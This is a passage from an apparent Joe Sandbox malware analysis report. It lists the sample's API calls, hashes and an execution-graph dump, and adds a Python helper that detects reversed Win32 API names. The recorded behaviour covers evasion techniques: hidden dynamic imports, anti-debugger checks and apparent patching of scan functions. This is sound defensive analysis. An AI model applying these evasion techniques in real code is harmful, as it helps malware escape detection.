                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule$AddressProc
                                                                                                                • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                • API String ID: 1883125708-1952140341
                                                                                                                • Opcode ID: 1908b8774fb922f7b8f3f3a5854604203f3b06f79c6bdcc5693a9d5e5976d2a9
                                                                                                                • Instruction ID: b80baa681071f53229c784ba1550a3f9d00612108d9eed27a67991c0d987e463
                                                                                                                • Opcode Fuzzy Hash: 1908b8774fb922f7b8f3f3a5854604203f3b06f79c6bdcc5693a9d5e5976d2a9
                                                                                                                • Instruction Fuzzy Hash: 6AF06D74AC4708AFEB00FBA4DD11E6AF7EDEB4AB40761D865B80483710D670AE128A64
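                                                                                                                The String ID fields of the two GetModuleHandle/GetProcAddress functions above carry the API names backwards ("sserddAcorPteG" is GetProcAddress reversed, "AeldnaHeludoMteG" is GetModuleHandleA reversed), which is a common trick to keep the resolved import names out of a plain strings listing while the other resolver functions on this page ("IsDebuggerPresent", "GetDiskFreeSpaceExA") use the names as-is. The following is an added triage helper, not part of the Joe Sandbox report or of the sample: it splits the report's "$"-separated String ID values, and flags each token that is, or reverses to, a Win32 export name. The allowlist KNOWN_APIS is a small constructed set for illustration (a real scan would use the export tables of kernel32.dll/kernelbase.dll); the REPORT_STRING_IDS values are copied from the function blocks on this page.

```python
# Added example (not part of the Joe Sandbox report): flag plain and reversed
# Win32 API names in the "String ID" fields of function-level analysis blocks.
from typing import Dict, List, Optional

# Constructed allowlist for illustration only. A production scan would load the
# full export name lists of kernel32.dll / kernelbase.dll / ntdll.dll instead.
KNOWN_APIS = frozenset({
    "GetProcAddress", "GetModuleHandleA", "GetModuleHandleW",
    "IsDebuggerPresent", "CheckRemoteDebuggerPresent", "GetDiskFreeSpaceExA",
    "LoadLibraryA", "LoadLibraryW", "VirtualAlloc", "VirtualProtect",
    "CreateProcessW", "WriteProcessMemory", "ResumeThread",
})


def classify(token: str) -> Optional[str]:
    """Return 'plain', 'reversed' or None for one string token.

    Matching is case-sensitive because Win32 export names are. A 'reversed'
    hit means the code almost certainly un-reverses the string at runtime
    before passing it to GetProcAddress, so the import never appears in the
    PE import table or in a naive strings dump.
    """
    if token in KNOWN_APIS:
        return "plain"
    if token[::-1] in KNOWN_APIS:
        return "reversed"
    return None


def scan_string_ids(string_ids: List[str]) -> Dict[str, Dict[str, str]]:
    """Split each Joe Sandbox 'String ID' value on '$' and classify tokens.

    Returns {token: {"kind": "plain"|"reversed", "api": resolved_name}} for
    every token that is, or reverses to, a known API name. Module names such
    as "Kernel32" or "KernelBASE" are GetModuleHandle arguments, not exports,
    and are deliberately not flagged.
    """
    hits: Dict[str, Dict[str, str]] = {}
    for field in string_ids:
        for tok in field.split("$"):
            kind = classify(tok)
            if kind is None:
                continue
            hits[tok] = {
                "kind": kind,
                "api": tok if kind == "plain" else tok[::-1],
            }
    return hits


# String ID values copied from the function blocks of this report.
REPORT_STRING_IDS = [
    "Kernel32$sserddAcorPteG",
    "AeldnaHeludoMteG$KernelBASE",
    "IsDebuggerPresent$KernelBase",
    "GetDiskFreeSpaceExA$kernel32.dll",
    "eeee$ggg$yyyy",
]


if __name__ == "__main__":
    for tok, info in scan_string_ids(REPORT_STRING_IDS).items():
        print(f"{tok:20} -> {info['api']:20} ({info['kind']})")
```

                                                                                                                Two caveats when using this on other reports: reversal is only one of several cheap string obfuscations (XOR, ROT, per-character arithmetic), so an absence of hits does not mean the sample resolves nothing dynamically; and a plain hit such as "IsDebuggerPresent" resolved through GetProcAddress is itself worth noting, since the call is being hidden from the import table even though the name is not.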
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(KernelBase,?,02EDFAEB,UacInitialize,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,ScanBuffer,02F47380,02EEB7B8,ScanString,02F47380,02EEB7B8,Initialize), ref: 02EDF6EE
                                                                                                                • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02EDF700
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                • String ID: IsDebuggerPresent$KernelBase
                                                                                                                • API String ID: 1646373207-2367923768
                                                                                                                • Opcode ID: 0c64bf65f976ef85819f0e7c1d3e9510483231dd0a5987252408b5b1b8bf3bb1
                                                                                                                • Instruction ID: 11b758c0e901745c84c80949149209fc87cf9cf2b01be8f124f3e82922d599dd
                                                                                                                • Opcode Fuzzy Hash: 0c64bf65f976ef85819f0e7c1d3e9510483231dd0a5987252408b5b1b8bf3bb1
                                                                                                                • Instruction Fuzzy Hash: 04D012A13F035029FE00B3F41CC485A038C899452D334BE20F023C64D2E5A688175114
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,02EED10B,00000000,02EED11E), ref: 02ECC47A
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02ECC48B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                • API String ID: 1646373207-3712701948
                                                                                                                • Opcode ID: bc489c1e50232386ba42426cdb17fa43da4d9c1fab3dda097a33bfd5d3c0bb3c
                                                                                                                • Instruction ID: 7d855aef9a7f7e7ee4ee90b3ec0c0e59254c916b0a2ab29d32eeaf2f92542db4
                                                                                                                • Opcode Fuzzy Hash: bc489c1e50232386ba42426cdb17fa43da4d9c1fab3dda097a33bfd5d3c0bb3c
                                                                                                                • Instruction Fuzzy Hash: 70D05EB0AC03549AEA00ABF25680632229CA75C328B78F82EF4154D200E77258628F59
                                                                                                                APIs
                                                                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02ECE297
                                                                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02ECE2B3
                                                                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02ECE32A
                                                                                                                • VariantClear.OLEAUT32(?), ref: 02ECE353
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 920484758-0
                                                                                                                • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                • Instruction ID: a692e594c56c2957b82b17dc20a0280d046f36acc0a25df7ef6e2430174de40d
                                                                                                                • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                • Instruction Fuzzy Hash: 6E415C75A416298FCB66DB98CE90BC9B3BDAF48314F1491D9E50CE7311DA30AF828F50
                                                                                                                APIs
                                                                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02ECAD59
                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02ECAD7D
                                                                                                                • GetModuleFileNameA.KERNEL32(02EC0000,?,00000105), ref: 02ECAD98
                                                                                                                • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02ECAE2E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 3990497365-0
                                                                                                                • Opcode ID: 9c32dd27ebb9d7399d15e865ab1e5a5f23f7ac887f74840d25c49fd17b761374
                                                                                                                • Instruction ID: 2afb41221994998c5bf7948ddbe97b44be63dfa6785a2e5c959babc4d7f81580
                                                                                                                • Opcode Fuzzy Hash: 9c32dd27ebb9d7399d15e865ab1e5a5f23f7ac887f74840d25c49fd17b761374
                                                                                                                • Instruction Fuzzy Hash: 8A413D70A8021C9BDB21DF98CE84BDAB7FD9B48304F1490E9A548E7341D7709F858F50
                                                                                                                APIs
                                                                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02ECAD59
                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02ECAD7D
                                                                                                                • GetModuleFileNameA.KERNEL32(02EC0000,?,00000105), ref: 02ECAD98
                                                                                                                • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02ECAE2E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 3990497365-0
                                                                                                                • Opcode ID: 9fa309415c7532e735aa4c377f573faccef9bb4a714657771a75e09f5b35b120
                                                                                                                • Instruction ID: ed6621d821b0ccedf1a1d45da7e55e18aa7ccb6ad5f9b9cc5c96762cac6abed8
                                                                                                                • Opcode Fuzzy Hash: 9fa309415c7532e735aa4c377f573faccef9bb4a714657771a75e09f5b35b120
                                                                                                                • Instruction Fuzzy Hash: 35414C70A8021C9FDB21DF98CE84BDAB7FD9B48304F2490E9A548E7341DB709E858F90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bbbdf040acf674eff7b883cc024f2d38dc9892ce3c6239ce3e572bf8f20f733a
                                                                                                                • Instruction ID: db8d5d196a4d951927da4ebee7da12b2fc7c6aebf0814a13c76eb3b75fcdc45f
                                                                                                                • Opcode Fuzzy Hash: bbbdf040acf674eff7b883cc024f2d38dc9892ce3c6239ce3e572bf8f20f733a
                                                                                                                • Instruction Fuzzy Hash: 49A1E8A67906040BD718AAFD9E803ADB7C29B85365F38D27EE11DCF383DB64C9538650
                                                                                                                APIs
                                                                                                                • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02EC95DA), ref: 02EC9572
                                                                                                                • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02EC95DA), ref: 02EC9578
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DateFormatLocaleThread
                                                                                                                • String ID: yyyy
                                                                                                                • API String ID: 3303714858-3145165042
                                                                                                                • Opcode ID: dcbbcb6ff25a8a4d28b3972e5528b5d490c0898cff37bfe17607bb1e6ffc6a39
                                                                                                                • Instruction ID: fb0d62ec98a81cf44cd1851fed2a7f8d2e0585affc6e36383b414f41ee26553c
                                                                                                                • Opcode Fuzzy Hash: dcbbcb6ff25a8a4d28b3972e5528b5d490c0898cff37bfe17607bb1e6ffc6a39
                                                                                                                • Instruction Fuzzy Hash: 40218071A402189FDB10DFE4CA91ABEB3B9EF08700F6090A9F805E7281D7309E42CB65
                                                                                                                APIs
                                                                                                                  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02ED823C,?,?,00000000,?,02ED7A7E,ntdll,00000000,00000000,02ED7AC3,?,?,00000000), ref: 02ED820A
                                                                                                                  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNELBASE(?), ref: 02ED821E
                                                                                                                  • Part of subcall function 02ED8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02ED82FC,?,?,00000000,00000000,?,02ED8215,00000000,KernelBASE,00000000,00000000,02ED823C), ref: 02ED82C1
                                                                                                                  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02ED82C7
                                                                                                                  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(?,?), ref: 02ED82D9
                                                                                                                • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02ED83C2), ref: 02ED83A4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                                • String ID: FlushInstructionCache$Kernel32
                                                                                                                • API String ID: 3811539418-184458249
                                                                                                                • Opcode ID: 91cfc7442f5330227bbe8ca8873b7f6f861e2f23f860da113d6a66e3b1c2fa59
                                                                                                                • Instruction ID: a4eed94e0f19b48ca6d366fb6588def3ab023ab3ac061aee756fb8ff3bf53997
                                                                                                                • Opcode Fuzzy Hash: 91cfc7442f5330227bbe8ca8873b7f6f861e2f23f860da113d6a66e3b1c2fa59
                                                                                                                • Instruction Fuzzy Hash: F6016D756C4308BFE700EFE5DC51FAAB7EDE748B00F61A460B904D6640D670AD128A24
                                                                                                                APIs
                                                                                                                • IsBadReadPtr.KERNEL32(?,00000004), ref: 02EDAF58
                                                                                                                • IsBadWritePtr.KERNEL32(?,00000004), ref: 02EDAF88
                                                                                                                • IsBadReadPtr.KERNEL32(?,00000008), ref: 02EDAFA7
                                                                                                                • IsBadReadPtr.KERNEL32(?,00000004), ref: 02EDAFB3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Read$Write
                                                                                                                • String ID:
                                                                                                                • API String ID: 3448952669-0
                                                                                                                • Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                                • Instruction ID: 919ba14528f06e600b292c3f9357927b92bf6a497c9c37afe341c08563d91c70
                                                                                                                • Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                                • Instruction Fuzzy Hash: D321B7B2680619AFDB10DF6ACD80BAF736AEF80315F10D561FD1497380D734E9128690

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:2%
                                                                                                                Dynamic/Decrypted Code Coverage:96.7%
                                                                                                                Signature Coverage:5.7%
                                                                                                                Total number of Nodes:1084
                                                                                                                Total number of Limit Nodes:20
9585 10042b6a 9584->9585 9589 10042ac0 9584->9589 9588 10044c0d _abort 5 API calls 9585->9588 9591 10042c16 9588->9591 9594 100434ff 9589->9594 9591->9256 9593 10044706 43 API calls 9593->9585 9595 1003fd79 __fassign 38 API calls 9594->9595 9596 1004351f MultiByteToWideChar 9595->9596 9598 100435f5 9596->9598 9599 1004355d 9596->9599 9600 10044c0d _abort 5 API calls 9598->9600 9602 100432fa 21 API calls 9599->9602 9605 1004357e _abort 9599->9605 9603 10042b21 9600->9603 9601 100435ef 9613 1004361c 9601->9613 9602->9605 9608 10044706 9603->9608 9605->9601 9606 100435c3 MultiByteToWideChar 9605->9606 9606->9601 9607 100435df GetStringTypeW 9606->9607 9607->9601 9609 1003fd79 __fassign 38 API calls 9608->9609 9610 10044719 9609->9610 9617 100444e9 9610->9617 9614 10043628 9613->9614 9616 10043639 9613->9616 9615 10042096 _free 20 API calls 9614->9615 9614->9616 9615->9616 9616->9598 9618 10044504 9617->9618 9619 1004452a MultiByteToWideChar 9618->9619 9620 10044554 9619->9620 9621 100446de 9619->9621 9624 100432fa 21 API calls 9620->9624 9627 10044575 9620->9627 9622 10044c0d _abort 5 API calls 9621->9622 9623 10042b42 9622->9623 9623->9593 9624->9627 9625 1004462a 9630 1004361c __freea 20 API calls 9625->9630 9626 100445be MultiByteToWideChar 9626->9625 9628 100445d7 9626->9628 9627->9625 9627->9626 9644 10042317 9628->9644 9630->9621 9632 10044601 9632->9625 9635 10042317 11 API calls 9632->9635 9633 10044639 9634 100432fa 21 API calls 9633->9634 9637 1004465a 9633->9637 9634->9637 9635->9625 9636 100446cf 9639 1004361c __freea 20 API calls 9636->9639 9637->9636 9638 10042317 11 API calls 9637->9638 9640 100446ae 9638->9640 9639->9625 9640->9636 9641 100446bd WideCharToMultiByte 9640->9641 9641->9636 9642 100446fd 9641->9642 9643 1004361c __freea 20 API calls 9642->9643 9643->9625 9645 100420ef __dosmaperr 5 API calls 9644->9645 9646 1004233e 9645->9646 9649 10042347 9646->9649 9652 1004239f 9646->9652 9650 10044c0d _abort 5 API calls 9649->9650 9651 10042399 
9650->9651 9651->9625 9651->9632 9651->9633 9653 100420ef __dosmaperr 5 API calls 9652->9653 9654 100423c6 9653->9654 9655 10044c0d _abort 5 API calls 9654->9655 9656 10042387 LCMapStringW 9655->9656 9656->9649 9658 1004284d _abort 9657->9658 9665 10042813 RtlEnterCriticalSection 9658->9665 9660 10042857 9666 100428ac 9660->9666 9664 10042870 _abort 9664->9261 9665->9660 9678 10042fcc 9666->9678 9668 100428fa 9669 10042fcc 26 API calls 9668->9669 9670 10042916 9669->9670 9671 10042fcc 26 API calls 9670->9671 9672 10042934 9671->9672 9673 10042864 9672->9673 9674 10042096 _free 20 API calls 9672->9674 9675 10042878 9673->9675 9674->9673 9692 1004282a RtlLeaveCriticalSection 9675->9692 9677 10042882 9677->9664 9679 10042fdd 9678->9679 9688 10042fd9 9678->9688 9680 10042fe4 9679->9680 9683 10042ff7 _abort 9679->9683 9681 100415d3 __dosmaperr 20 API calls 9680->9681 9682 10042fe9 9681->9682 9684 10041517 _abort 26 API calls 9682->9684 9685 10043025 9683->9685 9686 1004302e 9683->9686 9683->9688 9684->9688 9687 100415d3 __dosmaperr 20 API calls 9685->9687 9686->9688 9690 100415d3 __dosmaperr 20 API calls 9686->9690 9689 1004302a 9687->9689 9688->9668 9691 10041517 _abort 26 API calls 9689->9691 9690->9689 9691->9688 9692->9677 10094 4bf794 10095 4bf7a0 10094->10095 10095->10094 10096 4bf8b4 GetPEB 10095->10096 10097 4bf7e1 10095->10097 9026 100097e0 9030 10008645 9026->9030 9032 10008e26 9026->9032 9028 100098be GetFileSize 9028->9032 9032->9026 9032->9028 9032->9030 9034 1000987f ReadFile 9032->9034 9035 10009a1f 9032->9035 9038 1000848b 9032->9038 9041 100089b0 9032->9041 9042 1000b180 9032->9042 9055 10005f10 9032->9055 9033 10005d20 VirtualAlloc VirtualFree 9033->9038 9034->9032 9035->9030 9036 10009a29 SetFilePointerEx 9035->9036 9036->9030 9038->9030 9038->9033 9059 100084c0 9038->9059 9065 10011d60 9038->9065 9039 100084c0 2 API calls 9039->9041 9041->9030 9041->9039 9069 10005d20 9041->9069 9051 1000b0de 9042->9051 9043 1000b2a7 SetFilePointerEx 9044 1000b1df 
9043->9044 9047 1000b1c6 9043->9047 9044->9032 9045 1000b196 9046 1000b3a6 9045->9046 9045->9047 9048 1000b3b2 9046->9048 9049 1000b328 SetFilePointerEx 9046->9049 9047->9044 9050 1000b2e0 WriteFile 9047->9050 9048->9032 9049->9032 9050->9032 9051->9042 9051->9043 9051->9045 9051->9049 9052 1000b0d0 SetFilePointerEx 9051->9052 9053 1000b253 9051->9053 9052->9051 9054 1000b054 9052->9054 9053->9032 9054->9032 9057 10005f13 9055->9057 9056 10006084 SetFilePointerEx 9056->9057 9057->9055 9057->9056 9058 10005d90 9057->9058 9058->9032 9063 1000848b 9059->9063 9060 10008645 9060->9038 9061 10011d60 2 API calls 9061->9063 9062 10005d20 VirtualAlloc VirtualFree 9062->9063 9063->9059 9063->9060 9063->9061 9063->9062 9064 100084c0 2 API calls 9063->9064 9064->9059 9066 10011d76 9065->9066 9068 10011d62 9065->9068 9066->9038 9067 10005d20 2 API calls 9067->9068 9068->9038 9068->9066 9068->9067 9070 10005d22 9069->9070 9070->9041 9071 10005d39 VirtualAlloc 9070->9071 9073 10005d46 VirtualFree 9070->9073 9071->9070 9073->9041 10098 10048de0 10099 10048df9 __startOneArgErrorHandling 10098->10099 10101 10048e22 __startOneArgErrorHandling 10099->10101 10102 100436d2 10099->10102 10103 1004370b __startOneArgErrorHandling 10102->10103 10104 100439a3 __raise_exc RaiseException 10103->10104 10105 10043732 __startOneArgErrorHandling 10103->10105 10104->10105 10106 10043775 10105->10106 10108 10043750 10105->10108 10107 10043c94 __startOneArgErrorHandling 20 API calls 10106->10107 10110 10043770 __startOneArgErrorHandling 10107->10110 10113 10043cc3 10108->10113 10111 10044c0d _abort 5 API calls 10110->10111 10112 10043799 10111->10112 10112->10101 10114 10043cd2 10113->10114 10115 10043d46 __startOneArgErrorHandling 10114->10115 10116 10043cf1 __startOneArgErrorHandling 10114->10116 10118 10043c94 __startOneArgErrorHandling 20 API calls 10115->10118 10117 10043655 __startOneArgErrorHandling 5 API calls 10116->10117 10119 10043d32 10117->10119 10121 10043d3f 10118->10121 10120 10043c94 
__startOneArgErrorHandling 20 API calls 10119->10120 10119->10121 10120->10121 10121->10110 9813 401526 _controlfp 9814 40108c 15 API calls 9813->9814 9815 401580 9814->9815 9722 100058ac 9723 100058be 9722->9723 9724 100058d0 9722->9724 9725 100058d9 9724->9725 9726 10005d20 2 API calls 9724->9726 9726->9725 8830 1000aaf0 8831 1000ab06 8830->8831 8835 1000ab57 8831->8835 8836 10006490 8831->8836 8837 10005f10 8836->8837 8839 10005d90 8836->8839 8838 10006084 SetFilePointerEx 8837->8838 8837->8839 8838->8837 8840 1003faf0 8839->8840 8841 1003fafd 8840->8841 8844 1003fb84 8840->8844 8842 1003fb2a 8841->8842 8841->8844 8846 1004032f 8842->8846 8862 10041a1b 8842->8862 8847 1003fc05 8844->8847 8853 1003fbda 8844->8853 8846->8835 8850 1003fc38 8847->8850 8858 10040fe0 8847->8858 8850->8835 8851 10041167 8872 10040ff7 8851->8872 8852 1004116e 8855 10040fe0 __startOneArgErrorHandling 21 API calls 8852->8855 8853->8850 8853->8851 8853->8852 8857 10041173 8855->8857 8857->8835 8859 10041000 8858->8859 8876 10041c33 8859->8876 8863 10041a38 RtlDecodePointer 8862->8863 8865 10041a48 8862->8865 8863->8865 8864 10041ad5 8867 10041aca 8864->8867 8869 100415d3 __dosmaperr 20 API calls 8864->8869 8865->8864 8865->8867 8870 10041a7f 8865->8870 8866 10044c0d _abort 5 API calls 8868 100408d6 8866->8868 8867->8866 8868->8835 8869->8867 8870->8867 8871 100415d3 __dosmaperr 20 API calls 8870->8871 8871->8867 8873 10041000 8872->8873 8874 10041c33 __startOneArgErrorHandling 21 API calls 8873->8874 8875 10041020 8874->8875 8875->8835 8877 10041c72 __startOneArgErrorHandling 8876->8877 8882 10041cf4 